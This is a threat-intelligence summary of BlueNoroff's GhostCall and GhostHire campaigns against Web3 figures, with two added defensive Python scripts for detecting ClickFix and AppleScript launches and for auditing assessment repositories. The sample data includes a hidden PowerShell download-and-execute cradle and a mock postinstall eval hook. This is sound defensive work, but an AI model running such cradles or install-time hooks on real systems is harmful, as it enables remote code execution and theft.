Full Report
Threat actors tied to North Korea have been observed targeting the Web3 and blockchain sectors as part of twin campaigns tracked as GhostCall and GhostHire. According to Kaspersky, the campaigns are part of a broader operation called SnatchCrypto that has been underway since at least 2017. The activity is attributed to a Lazarus Group sub-cluster called BlueNoroff, which is also known as APT38,
Analysis Summary
# Threat Actor: BlueNoroff (Lazarus Group Sub-cluster)
## Attribution & Identity
* **Primary Attribution:** Threat actors tied to North Korea.
* **Known Aliases/Associated Groups:** Lazarus Group sub-cluster, APT38, CageyChameleon, CryptoCore, Genie Spider, Nickel Gladstone, Sapphire Sleet (formerly Copernicium), and Stardust Chollima.
## Activity Summary
* **Broader Operation:** Part of the larger **SnatchCrypto** operation, active since at least 2017.
* **Recent Campaigns (Twin Campaigns):** **GhostCall** and **GhostHire**, specifically targeting the Web3 and blockchain sectors. Kaspersky has tracked these since April 2025.
* **GhostCall Activity:** Assessed to be active since mid-2023, possibly as the successor to the **RustBucket** campaign. Recently observed shifting its social-engineering lure from Zoom to Microsoft Teams.
* **GhostHire Activity:** Focuses on tricking Web3 developers via Telegram.
## Tactics, Techniques & Procedures
* **Social Engineering & Lures:**
* **GhostCall:** Targeting executives via Telegram and luring them to investment-related meetings hosted on phishing websites that imitate Zoom. During the call the attackers replay genuine recordings of earlier victims rather than deepfakes, which makes the meeting look real.
* **GhostHire:** Approaching developers on Telegram with a time-limited (30-minute) skill assessment that must be completed from a booby-trapped GitHub repository.
* **Infection Mechanism (macOS Focus - GhostCall):**
* Victims are prompted to "Update Now" on the fake meeting page, which downloads a malicious AppleScript file.
* Running the script starts the macOS infection chains; later payloads arrive as malicious ZIP archives (see Tools & Infrastructure).
* **Infection Mechanism (Windows Focus - GhostCall):**
* Leverages the **ClickFix technique**: the fake page instructs the victim to copy a PowerShell command and run it themselves (typically via the Run dialog), so no exploit is needed for code execution.
* **Victim Tracking:** Every interaction on the fake site is recorded and beaconed to the attackers (this is telemetry on the victim, not persistence on the endpoint).
* **Historical TTP Continuity:** GhostCall's macOS tooling continues the line that began with the **RustBucket** campaign and the macOS malware families listed under Tools & Infrastructure.
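The two infection mechanisms above translate into a small set of process-creation signals. The following is an added example written for this summary, not code from Kaspersky's report or this page: a Python heuristic that tags Windows ClickFix launches (an interpreter spawned by explorer.exe with a hidden-window, encoded or download-and-execute command line) and, on macOS, osascript running a script from a user-writable download location or osascript spawning a downloader. The event schema, host paths and file names are constructed assumptions, not indicators from the campaign.

```python
"""Heuristic detection of the GhostCall initial-access paths over process-creation events.

Added example, not from the Kaspersky report or this page. The event records are
constructed, simplified versions of what an EDR, Sysmon EventID 1 or a macOS
process log would carry; field names and values are assumptions.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    host_os: str   # "windows" or "macos"
    parent: str    # parent process image path
    image: str     # new process image path
    cmdline: str   # full command line


def _base(path: str) -> str:
    """Basename that works for both Windows and POSIX paths on any host."""
    return re.split(r"[\\/]", path)[-1].lower()


# Windows: ClickFix ends with the victim pasting a command into the Run dialog,
# so the interpreter is a child of explorer.exe rather than of a script host
# or IDE. Typical traits of the pasted command: hidden window, encoded command,
# or a download-and-execute cradle.
WIN_INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
WIN_SUSPICIOUS = re.compile(
    r"(-enc(odedcommand)?\b"
    r"|-w(indowstyle)?\s+hidden"
    r"|\biex\b|invoke-expression"
    r"|\biwr\b|invoke-webrequest|downloadstring"
    r"|mshta\s+https?://)",
    re.IGNORECASE,
)

# macOS: the fake meeting page drops an AppleScript into a user-writable
# location and the victim runs it; the chain then pulls further components
# (the page reports ZIP archives), so osascript spawning a downloader or
# unpacker is a second signal.
MAC_USER_WRITABLE = re.compile(r"(/Users/[^/\s]+/Downloads/|/private/tmp/|/tmp/)")
MAC_DOWNLOADERS = {"curl", "unzip", "ditto"}


def classify(ev: ProcEvent) -> Optional[str]:
    """Return a detection tag for a single event, or None if nothing matched."""
    image, parent = _base(ev.image), _base(ev.parent)
    if ev.host_os == "windows":
        if (image in WIN_INTERPRETERS and parent == "explorer.exe"
                and WIN_SUSPICIOUS.search(ev.cmdline)):
            return "clickfix_run_dialog"
    elif ev.host_os == "macos":
        if image == "osascript" and MAC_USER_WRITABLE.search(ev.cmdline):
            return "applescript_from_download"
        if parent == "osascript" and image in MAC_DOWNLOADERS:
            return "osascript_stager_download"
    return None


def scan(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (index, tag) for every event that matched a rule."""
    hits = []
    for i, ev in enumerate(events):
        tag = classify(ev)
        if tag:
            hits.append((i, tag))
    return hits


# Constructed sample events (paths, hosts and file names are made up).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent("windows", r"C:\Windows\explorer.exe", PS,
              'powershell -w hidden -c "iwr http://example.invalid/u.ps1 | iex"'),
    ProcEvent("windows", r"C:\Windows\explorer.exe", PS, "powershell Get-Date"),
    # Encoded command from an IDE: the parent check keeps ordinary dev automation out.
    ProcEvent("windows", r"C:\Program Files\Microsoft VS Code\Code.exe", PS,
              "powershell -enc SQBFAFgA"),
    ProcEvent("macos", "/System/Library/CoreServices/Finder.app/Contents/MacOS/Finder",
              "/usr/bin/osascript", "osascript /Users/alice/Downloads/meeting_update.scpt"),
    ProcEvent("macos", "/usr/bin/osascript", "/usr/bin/curl",
              "curl -s -o /private/tmp/update.zip https://example.invalid/update.zip"),
    ProcEvent("macos", "/bin/bash", "/usr/bin/osascript",
              "osascript -e 'display notification \"build finished\"'"),
]

if __name__ == "__main__":
    for idx, tag in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {tag}")
```

Feed it real records by mapping parent image, image and command line into ProcEvent. The explorer.exe parent check is what separates a pasted Run-dialog command from an IDE, scheduled task or management agent using the same switches, and it is the first thing to loosen if broader coverage is worth the extra triage.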
## Targeting
* **Sectors:** Web3 and blockchain; also technology companies and venture capital firms, whose executives are the GhostCall targets.
* **Geography:**
* **GhostCall Victims:** Japan, Italy, France, Singapore, Turkey, Spain, Sweden, India, and Hong Kong.
* **GhostHire Major Hunting Grounds:** Japan and Australia.
* **Victims:**
* Executives at tech companies and VC firms (GhostCall).
* Web3 developers (GhostHire).
## Tools & Infrastructure
* **Malware Families:**
* Related to the actor's earlier macOS malware families **KANDYKORN**, **ObjCShellz**, and **TodoSwift**.
* **Infrastructure:**
* Initial contact is made over Telegram.
* Employs fake Zoom/Teams-like meeting interfaces and phishing websites.
* Uses malicious GitHub repositories for code delivery (**GhostHire**).
* Delivers payloads via downloaded malicious ZIP files and scripts (AppleScript).
## Implications
BlueNoroff/Lazarus has sustained a multi-year effort (since 2017) to monetize intrusions through theft, with a recent, significant focus on the lucrative Web3/crypto ecosystem. Its pivot to tailored social engineering over Telegram, with separate infection chains for macOS and Windows and lures built around routine professional tasks (meeting software updates, hiring assessments), shows an adaptable approach to gaining initial access at high-value targets: executives who control funds and developers who control code.
## Mitigations
* **User Training:** Awareness training focused on social engineering that exploits perceived professional needs: meeting links from new investment contacts, in-call software update prompts, and time-boxed hiring assessments.
* **Platform Vigilance:** Treat any request to update or install a video-conferencing client or SDK that arrives inside a meeting page, especially after joining a call from an unknown party, as suspect, and verify it out of band through the vendor's official client or download site before running anything.
* **Code Execution Control:** Strict policies on executing scripts or code obtained from external links, unsolicited GitHub repositories, or other unexpected sources; developers asked to complete an assessment should read install hooks and scripts before any install or run command, ideally in an isolated VM or container.
* **Endpoint Security:** Monitoring on macOS and Windows that covers the specific trail these chains leave. ClickFix shows up as an interpreter (powershell.exe, cmd.exe, mshta.exe) spawned by explorer.exe from the Run dialog, with the pasted command retained in the RunMRU registry key and a command line that uses -EncodedCommand, hidden-window switches, or a download-and-execute cradle. The macOS chain shows up as osascript running a script from a user-writable location such as ~/Downloads and then fetching and unpacking further archives.
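For the GhostHire scenario (a time-boxed assessment delivered as a GitHub repository), the practical control behind the Code Execution Control item is to read what a checkout would run before installing or running anything. The script below is an added example, not tooling from the report or this page. It assumes a Node.js or Python project and uses heuristics (install-time hooks, dynamic eval next to a long base64-like blob) that are assumptions about how such a repository might hide a first stage, not indicators from the campaign. The sample repository it builds is constructed.

```python
"""Pre-execution audit of a cloned 'skill assessment' repository.

Added example, not tooling from the report or this page. Assumes a Node.js
and/or Python project; the checks are heuristics meant to be read by the
developer before any install or run command, not a verdict.
"""
import json
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Package-manager hooks that execute code as a side effect of `npm install`.
NPM_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")
CODE_EXT = {".js", ".mjs", ".cjs", ".ts", ".py", ".sh"}

# `.exec(` on a RegExp is normal JS, hence the lookbehind excluding a dot.
DYNAMIC_EVAL = re.compile(r"(?<![\w.])(eval|exec|Function)\s*\(")
# A long base64-looking run is a common way to hide a second stage in source.
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")


def audit_repo(repo: str) -> List[Dict[str, str]]:
    """Walk the checkout and return findings a reviewer should read before running anything."""
    findings: List[Dict[str, str]] = []
    root = Path(repo)

    pkg = root / "package.json"
    if pkg.is_file():
        scripts = json.loads(pkg.read_text()).get("scripts", {})
        for hook in NPM_HOOKS:
            if hook in scripts:
                findings.append({"kind": "install_hook", "path": "package.json",
                                 "detail": f"{hook}: {scripts[hook]}"})

    setup_py = root / "setup.py"
    if setup_py.is_file() and "cmdclass" in setup_py.read_text():
        findings.append({"kind": "install_hook", "path": "setup.py",
                         "detail": "custom cmdclass runs code during pip install"})

    for path in root.rglob("*"):
        if (not path.is_file() or path.suffix not in CODE_EXT
                or "node_modules" in path.parts):
            continue
        text = path.read_text(errors="replace")
        if DYNAMIC_EVAL.search(text) and BASE64_BLOB.search(text):
            findings.append({"kind": "obfuscated_code",
                             "path": str(path.relative_to(root)),
                             "detail": "dynamic eval combined with a long base64-like blob"})
    return findings


def build_sample_repo() -> str:
    """Constructed repo that mimics a booby-trapped assessment; all contents are made up."""
    repo = tempfile.mkdtemp(prefix="assessment-")
    (Path(repo) / "scripts").mkdir()
    (Path(repo) / "src").mkdir()
    (Path(repo) / "package.json").write_text(json.dumps({
        "name": "trading-bot-assessment",
        "scripts": {"test": "jest", "postinstall": "node scripts/setup.js"},
    }))
    blob = "A" * 160  # stands in for an encoded second stage
    (Path(repo) / "scripts" / "setup.js").write_text(
        f'const p = "{blob}";\n'
        'eval(Buffer.from(p, "base64").toString());\n'
    )
    # Ordinary code: RegExp.exec and no blob, so it must not be flagged.
    (Path(repo) / "src" / "index.js").write_text(
        "const re = /x/; re.exec('x');\nmodule.exports = () => 1;\n"
    )
    return repo


if __name__ == "__main__":
    for f in audit_repo(build_sample_repo()):
        print(f"[{f['kind']}] {f['path']}: {f['detail']}")
```

Run it against the checkout before `npm install` or `pip install`, and treat any install_hook finding as a reason to read the referenced script in full; the obfuscation rule deliberately requires both an eval-style call and a blob in the same file so that ordinary minified assets and test fixtures do not drown the review in noise.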